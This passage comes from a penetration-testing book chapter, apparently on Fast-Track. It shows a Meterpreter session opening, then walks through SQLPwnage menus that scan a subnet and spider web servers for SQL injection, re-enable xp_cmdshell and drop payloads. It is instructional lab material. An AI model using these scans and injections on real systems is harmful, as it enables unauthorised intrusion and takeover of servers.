background image

172

Chapter 11

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.128:1030)

meterpreter >

You should now have full access to the machine using the Meterpreter 

payload. 

SQLPwnage

SQLPwnage

 is a mass brute force attack that can be used against web applica-

tions in an attempt to find Microsoft SQL injection. SQLPwnage will scan 
subnets for web servers on port 80, crawl websites, and attempt to fuzz post 
parameters until it finds SQL injection. It supports both error- and blind-
based SQL injection and will handle everything from privilege escalation to 
re-enabling the 

xp_cmdshell

 stored procedure, bypassing the Windows debug 

64KB restriction, and dropping any payload you want onto the system.

Begin the configuration for this attack by selecting 

Microsoft SQL Tools

 

from the Fast-Track main menu, followed by 

SQLPwnage

, option 2, as shown 

below.

SQLPwnage Main Menu:

1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)

2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)

3. SQL Injection single URL exploitation

Enter your choice: 

2

. . . SNIP . . .

Scan a subnet or spider single URL?

1. url

2. subnet (new)

3. subnet (lists last scan)

Enter the Number: 

2

Enter the ip range, example 192.168.1.1-254: 

10.211.55.1-254

Scanning Complete!!! Select a website to spider or spider all??

1. Single Website

2. All Websites

Enter the Number: 

2

Attempting to Spider: http://10.211.55.128
Crawling http://10.211.55.128 (Max Depth: 100000)
DONE
Found 0 links, following 0 urls in 0+0:0:0